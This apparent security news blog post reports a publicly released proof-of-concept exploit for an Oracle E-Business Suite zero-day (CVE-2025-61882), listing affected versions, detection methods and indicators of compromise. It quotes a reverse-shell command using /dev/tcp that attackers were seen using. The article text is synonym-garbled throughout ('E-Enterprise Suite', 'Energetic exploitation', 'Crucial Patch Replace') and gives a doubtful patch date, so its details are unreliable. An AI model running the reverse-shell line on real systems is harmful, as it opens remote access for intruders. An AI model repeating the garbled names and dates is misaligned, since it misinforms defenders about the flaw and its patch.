Skip to content
  • Blog Home
  • Cyber Map
  • About Us – Contact
  • Disclaimer
  • Terms and Rules
  • Privacy Policy
Cyber Web Spider Blog – News

Cyber Web Spider Blog – News

Globe Threat Map provides a real-time, interactive 3D visualization of global cyber threats. Monitor DDoS attacks, malware, and hacking attempts with geo-located arcs on a rotating globe. Stay informed with live logs and archive stats.

  • Home
  • Cyber Map
  • Cyber Security News
  • Security Week News
  • The Hacker News
  • How To?
  • Toggle search form

PoC Exploit Released for Remotely Exploitable Oracle E-Business Suite 0-Day Vulnerability

Posted on October 6, 2025October 6, 2025 By CWS

A essential zero-day vulnerability in Oracle E-Enterprise Suite has emerged as a major menace to enterprise environments, with proof-of-concept (PoC) exploit code now publicly out there. 

CVE-2025-61882 presents a extreme safety danger, attaining a most CVSS 3.1 rating of 9.8 and enabling distant code execution with out authentication throughout a number of Oracle E-Enterprise Suite variations.

The vulnerability impacts Oracle E-Enterprise Suite variations 12.2.3 by 12.2.14, particularly focusing on the Oracle Concurrent Processing BI Writer Integration part through the HTTP protocol. 

Oracle E-Enterprise Suite RCE Vulnerability

Safety researchers have recognized a flaw that permits unauthenticated distant attackers to execute arbitrary code on susceptible programs by network-based exploitation with low assault complexity.

Oracle’s safety advisory emphasizes the vulnerability’s classification as “remotely exploitable with out authentication,” that means attackers can leverage community entry with out requiring legitimate credentials. 

The vulnerability’s assault vector makes use of HTTP communications, with the scope remaining unchanged however delivering excessive affect throughout confidentiality, integrity, and availability metrics. 

Organizations can detect susceptible situations utilizing Nuclei detection templates that examine for “E-Enterprise Suite Residence Web page” textual content whereas evaluating Final-Modified header timestamps in opposition to October 4, 2025. 

The Oracle October 2023 Crucial Patch Replace serves as a prerequisite for making use of the required safety patches. Programs with modification dates previous this threshold point out unpatched installations vulnerable to exploitation.

Danger FactorsDetailsAffected ProductsOracle E-Enterprise Suite 12.2.3-12.2.14ImpactRemote Code ExecutionExploit PrerequisitesNetwork entry through HTTP protocol, No authentication requiredCVSS 3.1 Score9.8 (Crucial)

Energetic Exploitation

Energetic exploitation makes an attempt have been documented by particular Indicators of Compromise (IOCs), together with malicious IP addresses 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11 conducting GET and POST actions. 

Risk actors are using reverse shell instructions comparable to sh -c /bin/bash -i >& /dev/tcp// 0>&1 to determine outbound TCP connections for persistent entry.

Forensic evaluation reveals malicious artifacts together with the exploitation toolkit oracle_ebs_nday_exploit_poc_scattered_lapsus_retard_cl0p_hunters.zip (SHA-256: 76b6d36e04e367a2334c445b51e1ecce97e4c614e88dfb4f72b104ca0f31235d) containing Python exploitation scripts exp.py and server.py. 

These instruments reveal refined assault methodologies probably linked to identified menace teams, together with references to Scattered Spider, Lapsus$, and Cl0p ransomware operations.

Oracle strongly recommends the instant deployment of patches throughout all affected E-Enterprise Suite installations, emphasizing that solely programs below Premier Help or Prolonged Help obtain safety updates. 

Organizations ought to implement community monitoring for the recognized IOCs whereas conducting complete vulnerability assessments utilizing out there detection templates and Shodan queries focusing on html:”OA_HTML” patterns to establish uncovered situations.

Comply with us on Google Information, LinkedIn, and X for every day cybersecurity updates. Contact us to function your tales.

Cyber Security News Tags:0Day, EBusiness, Exploit, Exploitable, Oracle, PoC, Released, Remotely, Suite, Vulnerability

Post navigation

Previous Post: Zimbra Zero-Day Exploited to Target Brazilian Military via Malicious ICS Files
Next Post: QNAP NetBak Replicator Vulnerability Let Attackers Execute Unauthorized Code

Related Posts

Future of Passwords Biometrics and Passwordless Authentication Cyber Security News
The Most Active RAT Uses New Stagers and Loaders to Bypass Defenses Cyber Security News
Massive Supply Chain Attack Hijacks ctrl/tinycolor With 2 Million Downloads Cyber Security News
50 World’s Best Cyber Security Companies in 2025 (March) Cyber Security News
Threat Actors Claiming Breach of Airpay Payment Gateway Cyber Security News
Citrix Netscaler 0-day RCE Vulnerability Patched Cyber Security News

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News

Recent Posts

  • Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware
  • Why Threat Prioritization Is the Key SOC Performance Driver  
  • BK Technologies Data Breach – Hackers Compromise IT Systems and Exfiltrate Data
  • BatShadow Group Uses New Go-Based ‘Vampire Bot’ Malware to Hunt Job Seekers
  • Google’s New AI Doesn’t Just Find Vulnerabilities — It Rewrites Code to Patch Them

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Archives

  • October 2025
  • September 2025
  • August 2025
  • July 2025
  • June 2025
  • May 2025

Recent Posts

  • Microsoft Warns of Hackers Abuse Teams Features and Capabilities to Deliver Malware
  • Why Threat Prioritization Is the Key SOC Performance Driver  
  • BK Technologies Data Breach – Hackers Compromise IT Systems and Exfiltrate Data
  • BatShadow Group Uses New Go-Based ‘Vampire Bot’ Malware to Hunt Job Seekers
  • Google’s New AI Doesn’t Just Find Vulnerabilities — It Rewrites Code to Patch Them

Pages

  • About Us – Contact
  • Disclaimer
  • Privacy Policy
  • Terms and Rules

Categories

  • Cyber Security News
  • How To?
  • Security Week News
  • The Hacker News